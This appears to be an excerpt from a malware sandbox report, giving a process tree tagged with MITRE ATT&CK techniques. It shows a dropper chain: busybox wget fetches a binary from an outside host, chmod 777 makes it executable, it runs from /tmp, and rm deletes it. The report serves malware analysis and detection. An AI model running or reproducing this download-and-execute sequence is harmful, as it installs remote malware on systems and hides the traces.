/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:1022
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:1023
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:1024
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1026
-
Network
MITRE ATT&CK Enterprise v15